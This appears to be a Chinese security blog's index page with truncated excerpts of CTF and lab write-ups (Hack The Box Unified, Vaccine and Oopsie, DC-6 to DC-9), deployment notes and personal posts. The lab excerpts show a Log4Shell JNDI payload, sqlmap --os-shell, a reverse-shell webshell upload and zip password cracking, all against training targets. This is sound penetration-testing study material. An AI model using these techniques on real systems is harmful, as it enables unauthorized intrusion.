无题
这个报文是一个经过网络传输的数据包,它是以16进制表示的。下面是对这个数据包的分析:
12345678c0 e3 fb 19 9e 98 90 78 41 ef 07 8b 08 00 45 00 00 6a 59 2e 00 00 80 11 00 00 0a 21 10 2b c0 a801 04 f7 7d 00 a1 00 56 dc 5f 30 4c 02 01 00 04 06 70 75 62 6c 69 63 a0 3f 02 02 2e 48 02 01 00 02 01 00 30 33 30 0f 06 0b 2b 06 01 02 01 19 03 02 01 05 01 05 00 30 0f 06 0b 2b 06 01 02 01 19 03 05 01 01 01 05 00 30 0f 06 0b 2b 06 01 02 01 19 03 05 01 02 01 05 00
根据通信协议的不同,数据包的结构也有所不同。这个数据包的前14个字节是以太网头部,紧接着的20个字节是IP头部,然后是UDP头部和数据负载。
以太网头部:
1c0 e3 fb 19 ...
2023-桂电烽台工控CTF
线上
异常的工程
直接strings查找flag
入侵事件
记事本打开,然后根据题目意思,直接搜索password,就能找到准确时间(吐槽一下,题目描述错了)
签到题2
baby_pyc
在线网站反编译代码
解密脚本
12345678910from Crypto.Cipher import AESimport base64password = b'ragfwQEFAAAAAAAA'iv = b'1234567812345678'encrypted_text = base64.b64decode(b'HHAOD2xCZ0XIJTrOZB4t83wnFsi824jtpiRXI1usbkQ=')aes = AES.new(password,AES.MODE_CBC,iv)decrypted_text = aes.decrypt(encrypted_text).decode()print(decrypted_text)
unseen
因为是gif图,打开时是缺少了头文件,所以直接补充回来
然后用在线网站打开分析 ...
Git使用心得
使用git init进行空仓库的初始化,但是仓库是有东西的话就可以不用做这一步
使用git status查看当前的状态,可以看到我对README.md进行了修改但是未提交
使用git add .将所有添加或修改过的文件添加到暂存区
使用git status再查看当前的状态,可以看到,文件就是被添加到了暂存区
使用git commit -m "提交信息"提交暂存区的内容到本地仓库,“提交信息”可以修改为你对于修改的或者是新增的文件的一个描述或者做出的修改
使用git remote add origin 远程仓库地址把文件添加到远程仓库
如果是第一次提交,需要先将远程仓库的内容拉取下来,直接推送会报错,使用git pull
使用git push把提交内容推送到远程仓库上
CTFShow-web-命令执行
web29
源码:
1234567891011121314151617181920212223 <?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-09-04 00:12:34# @Last Modified by: h1xa# @Last Modified time: 2020-09-04 00:26:48# @email: h1xa@ctfer.com# @link: https://ctfer.com*/error_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);}
分析源码得知过滤了字符串flag和i
system(" ...
Hack the box Unified题解
打这个靶机的时候也是断断续续的,所以里面的目标IP前后对应不上,但是方法都是一样的。
扫端口
1nmap -sC -sV 10.129.96.149
访问8080端口重定向到了8443
看到是unifi6.4.54版本的,结合官方给的WP知道这个版本有一个CVE,可以以此为出发点进行攻击
CVE-2021-44228的利用
验证漏洞存在
先验证是不是存在这个漏洞
抓包,因为是https的站,所以要对burpsuite进行一些设置Burp Suite抓HTTPS数据包教程
然后根据官方的WP,需要把remember的值改成${jndi:ldap://Tun 0的IP/o=tomcat}
验证存在
实施攻击
漏洞利用环境搭建
更新&&安装环境
sudo apt update
sudo apt install openjdk-11-jdk -y
sudo apt-get install maven
安装工具
git clone https://github.com/veracode-research/rogue-jndi
cd r ...
Hack the box Vaccine题解
在打靶机的时候网络有点问题,所以这份WP里的目标机器的IP前后是不一样的,但总的来说,方法大同小异
扫端口
1nmap -sC -sV 10.129.252.99
开启了21、22和80端口,访问80端口,什么都没有,结合任务1和任务2,就直接练上去看有没有东西
ftp
连上以后把文件复制出来
破解zip密码
解压的时候发现是有密码的
看到任务4,和经过百度知道利用zip2john去获取压缩包的hash值,然后使用john去破解hash值
破解成功
backup的内容
得到了两个文件
其中index.php里面有网站的管理员账号和密码,密码经过了md5加密,经过破解得到:qwerty789,这也是任务5的答案
sql注入
登录到后台后有个搜索框尝试有无sql注入,发现可注入,加上任务6的提示,那就直接sqlmap一把梭
用burpsuite抓包保存到1.txt后,利用sqlmap进行注入,并利用--os-shell进行执行shell的命令
注入命令:
1sqlmap -r 1.txt --os-shell
反弹shell
攻击机监听
1n ...
wsl2修改安装路径
暂停wsl运行
1wsl -l -v
有Running说明还在运行,需要将其停止运行
1wsl --shutdown
导出子系统
导出你需要更改路径的Linux系统,例如我需要导出我的Ubuntu-22.04,并导出到d盘
1wsl --export Ubuntu-22.04 d:\Ubuntu-22.04.tar
在d盘就可以找到导出的文件
注销子系统
注销要导出的子系统
1wsl --unregister Ubuntu-22.04
再次查看wsl的运行情况时,就没有了Ubuntu-22.04了
导入子系统
1wsl --import Ubuntu-22.04 D:\wsl-ubuntu D:\Ubuntu-22.04.tar
import后面是:导入系统的名称+安装的路径+打包好的系统镜像的路径
Hack the box Oopsie题解
扫机器
拿到目标机器的IP,先看一下,开放了什么端口
1nmap -sC -sV 10.129.95.191
80和22端口有服务在运行,先从80端口入手
在访问80端口的服务时看到这一句话,就是要让我们找登录页,但是并没有找到可以点击登录的地方
路径泄漏
F12打开调试就看到了泄露的路径
看到可以以游客的身份登录
登陆后看到有上传的地方,这就是我们的突破口
但是需要超级管理员的账号
越权
当点进Account页面的时候URL引起了注意,id=2,那就意味着id=1是管理员账号了,那就试试
Account确实是变成了admin,但是点到Uploads的时候还是显示需要管理员账号,那我们可以尝试看看能不能从cookie入手
对应修改好后,上传页就能用了
上传webshell
用的是kali自带的php-reverse-shell.php,使用方法GitHub上有
利用成功,找有用的信息
信息收集
在/var/www/html/cdn-cgi/login目录下发现了db.php,并且拿到了数据库的账号密码,
在/home/robert下拿到了user.txt ...
给主机加无线网卡
0x01
去年(22年)6月份收了一个大四学长的主机,具体配置如下:
其中无线网卡是最近才加上的,因为我现在是双机状态,一台笔记本(小米笔记本Pro14增强版),一台主机,经常要在两台机器之间互换,键鼠的切换就挺麻烦的,要两套键鼠的话就挺难受的,因为桌面空间不算很大,而且键盘搬来搬去的就挺麻烦的,就想着全部无线化。键盘是三模的,就可以同时连接多台设备按相应的组合键去切换设备就好,鼠标用两个无线的鼠标就行,反正鼠标不算占地。
0x02
买了COMFAST的CF-AX201,到货之后就直接开装
装完打完驱动,发现只有蓝牙能用,WiFi用不了,然后问客服才知道是一块m2硬盘抢了WiFi的通道,然后百度解决方案,发现这是这个主板的问题
被迫无奈去淘宝找了个延长线,因为我的显卡太大了,完全盖住了pcie3的接口,问了客服延长线需要7mm的高度,我还特地拿个尺子去量,刚刚好就是7mm左右
买回来装上非常完美,现在就是可以完美发挥这张网卡的所有功能
docker单机部署GZCTF
前言
最早接触的自建CTF平台就是CTFd,然后在GitHub上面又发现了GZTime大佬开发的GZCTF平台,然后就尝试着部署了,因为是全新的架构,部署的时候遇到了问题也在群里得到了解决,现在又想着在内网重新搭建一遍,发现有些细节的地方有点忘了,所以就想着写下这篇文章记录一下,也方便后续自己可能在其他地方进行部署的时候能比较快的完成部署。
开发平台的师傅已经建好了搭建教程的仓库了,k8s+docker和仅k8s的教程相信很快也能写完了
仓库地址:https://github.com/GZTimeWalker/GZCTF/tree/docs/docs/pages/deployment
文章地址:https://docs.ctf.gzti.me/
准备内容
在GitHub上找到项目的Releases下载最新版的包(开发师傅不推荐用git)
安装好docker和docker-compose,这两项的安装网上有教学
端口暴露范围设置
这里可设置也可以不设置,看个人需求,如果是云服务器的还是推荐设置,内网的话那就无所谓了,这里只列出docker部署时的设置方法,k3s及其他方 ...
esxi搭建多层网络环境
网络拓补图
准备工作
esxi6.7
istoreos系统
靶场镜像
因为esxi不支持设置nat类型的虚拟网卡,所以就另辟蹊径使用软路由系统来配置网关并结合现有的网络实现三层网络,并且为了不影响原本自用网络的ip占用冲突等问题,把自用网络的子网掩码位改成了23,这样就使得192.168.10.0和192.168.11.0都在同一个网段中,然后把dhcp池设置为192.168.10.2~192.168.10.254,然后192.168.11.0以后的都用来当作esxi里的虚拟机的IP。
软路由系统的选择
现在主流的软路由系统就是openwrt和ikuai这两个,但为什么不使用这两个而是去使用基于openwrt二次开发的istore os呢,是因为openwrt官网下载的镜像是 .img类型的,我试过按照网上的教程去转成esxi服务器所使用的虚拟机文件格式,但是导入服务器之后就一直不能进入软路由系统,试了几次之后就放弃了,然后去安装了ikuai,系统是能正常进入了但是在设置Lan口的ip的时候,点击完应用之后重启系统后,ip又变回了默认的,后面就想到了之前在B站刷到过的is ...
新年快乐
癸卯年 兔癸丑月 庚辰日
大年初一放烟花的相片
DC-9复现
DC-9复现
描述
DC-9是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。
这个挑战的最终目标是获得根并阅读唯一的标志。
Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。
对于初学者来说,谷歌可以提供很大的帮助,但你总是可以在@DCAU7发推文给我寻求帮助,让你再次前进。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。
信息收集
确定目标的ip以及开启的端口
发现有一个完整的表单,那就直接sqlmap爆破数据库
1sqlmap -u "http://192.168.71.131/results.php" --data "search=1" --dbs
爆出三个库
爆破表
1sqlmap -u "http://192.168.71.131/results.php" --data "search=1" -D users --tables
爆破列
1sqlmap -u "http://192.168. ...
DC-8复现
DC-8复现
描述
DC-8是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。
这个挑战有点混合,既是实际挑战,又是关于在Linux上安装和配置的双因素身份验证是否可以防止Linux服务器被利用的“概念证明”。
这个挑战的“概念验证”部分是由于Twitter上被问到一个关于双因素身份验证和Linux的问题,也是由于@theart42的建议。
此挑战的最终目标是绕过双因素身份验证,获取root并读取唯一的标志。
除非您尝试通过SSH登录,否则您甚至可能不知道安装和配置了双因素身份验证,但它肯定在那里并且正在做它的工作。
Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。
对于初学者来说,谷歌可以提供很大的帮助,但你总是可以在@DCAU7发推文给我寻求帮助,让你再次前进。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。
信息收集
确认目标机器的IP以及开启的端口
访问80端口,点击welcome to DC-8发现这个url有点问题,猜想有sql注入
扫描目录看看有没有登录口
1dirsearch - ...
DC-7复现
DC-7复现
描述
DC-7是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。
虽然这不是一个过于技术性的挑战,但它并不容易。
虽然这是早期DC版本的逻辑进展(我不会告诉你是哪一个),但涉及一些新概念,但你需要自己弄清楚这些概念。:-)如果您需要诉诸暴力破解或字典攻击,您可能不会成功。
你需要做的,是“跳出框框”思考。
哇 盒子的“外面”。😃
这个挑战的最终目标是获得根并阅读唯一的标志。
Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。
对于初学者来说,谷歌可以提供很大的帮助,但你总是可以在@DCAU7发推文给我寻求帮助,让你再次前进。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。
信息收集
确定目标的IP,以及开放的端口
nmap 192.168.71.0/24
访问80端口上的服务
机翻
根据这个提示,说不是技术性的问题,那就有可能是找线索,然后可以发现在脚标处有一个@DC7USER,用谷歌搜索进到了他的GitHub主页,在他的staffdb仓库中的config.php里发现了一个账号 ...
网络空间安全导论知识点题纲
第一章
一、网络安全的重要性?
网络安全事关政治安全
网络安全事关经济安全
网络安全事关文化安全
网络安全事关社会安全
网络安全事关国防安全
二、网络强国目标?
建设网络强国的近期目标是:技术强,即要有自己的技术,有过硬的技术;基础强,即
要有良好的信息基础设施,形成实力雄厚的信息经济;内容强,即要有丰富全面的信息服
务,繁荣发展的网络文化;人才强,即要有高素质的网络安全和信息化人才队伍;国际话语
权强,即要积极开展双边、多边的互联网国际交流合作。
建设网络强国的中期目标是:建设网络强国的战略部署与“两个一百年”奋斗目标同
步推进,向着网络基础设施基本普及、自主创新能力显著增强、信息经济全面发展、网络安
全保障有力的目标不断前进。
建设网络强国的远期目标是:战略清晰,技术先进,产业领先,制网权尽在掌握,网络
安全坚不可摧。
三、在维护网络空间安全和平需要遵循哪些原则?
战略原则
尊重维护网络空间主权
和平利用网络空间
依法治理网络空间
统筹网络安全与发展
四、如何树立正确的网络安全观?
网络安全是整体的而不是割裂的
网络安全是动态的而不是静态的
网络安全是开放的而 ...
DC-6复现
DC-6复现
描述
DC-6 是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。
这不是一个过于困难的挑战,因此对初学者来说应该很棒。
这一挑战的最终目标是获得根并阅读唯一的标志。
必须具备 Linux 技能和熟悉 Linux 命令行,以及一些基本渗透测试工具的经验。
对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAU7 上给我发推文,寻求帮助,让你重新开始。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。
线索
好吧,这并不是一个真正的线索,但对于那些只想继续工作的人来说,更多的是一些“我们不想花五年时间等待某个过程完成”的建议。
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt 这应该可以为您节省几年时间。😉
信息收集
获取ip地址以及开启的服务
访问80端口的服务,并不能正常的访问到
修改hosts文件,然后就可以正常访问了
该网站是wordpress搭建的博客
利用dirsearch扫出网站的后台登陆网站
爆破
使用wpsca ...
CTFshow-web21-28
web21
题目:
burp抓包利用Intruder模块进行爆破,在根据hint1里的提示知道这是一个tomcat认证爆破,所以标记Authorization: Basic
Authorization字段后面的值经过了base64的加密,所以爆破时也要进行相应的加密
Payload sets的设置,字典利用题目给的附件,用户名猜一手admin,最后也是证明猜对了
web22
域名失效了做不了
web23
题目:
源码:
123456789101112131415161718192021222324252627<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-09-03 11:43:51# @Last Modified by: h1xa# @Last Modified time: 2020-09-03 11:56:11# @email: h1xa@ctfer.com# @link: https://ctfer.com*/error_reporting(0);in ...
招新平台的搭建与维护
搭建
需求
能满足互联网访问
web和pwn的环境是可以使用动态容器
准备
平台:开源项目CTFd
服务器:一个可以联网的,稳定运行的服务器(我们的平台用的是Ubuntu系统)
部署:docker部署
CTFd动态容器插件:CTFd-Whale
一键部署多个pwn题的环境:pwn_deploy_chroot
教程
懒人一键部署版:CTFd&ctfd-whale动态靶机搭建与维护
从头专研部署版:CTFd动态靶机搭建教程
个人搭建心得
因为个人技术道行不足,加上个人开摆心态,我选择的是懒人版本
这个版本git项目下来之后需要把docker-compose.yml里的一行代码注释或者删掉才能起得来(这个只针对懒人版)
对平台的优化
服务绑定了域名,利用nginx进行代理80和443端口并绑定域名
以及其他的优化,都写在了CTFd平台个性化里
动态容器题目部署
web
使用Github上开源的镜像做基础,分有分有很多类型,具体查看ctfhub_base_image
web题目的模板结构
pwn
在ctfhub_base_i ...
CTFd平台个性化
平台前端页面框架
2022-8-18第一版
主页
123456789101112<div class="row"> <div class="col-md-6 offset-md-3"> <img class="w-100 mx-auto d-block" style="max-width: 500px;padding: 50px;padding-top: 14vh;" src="平台中央logo" /> <h3 class="text-center"> <p> text <a href="url">text</a></p> </h3> <p style="text-align: center;">Q ...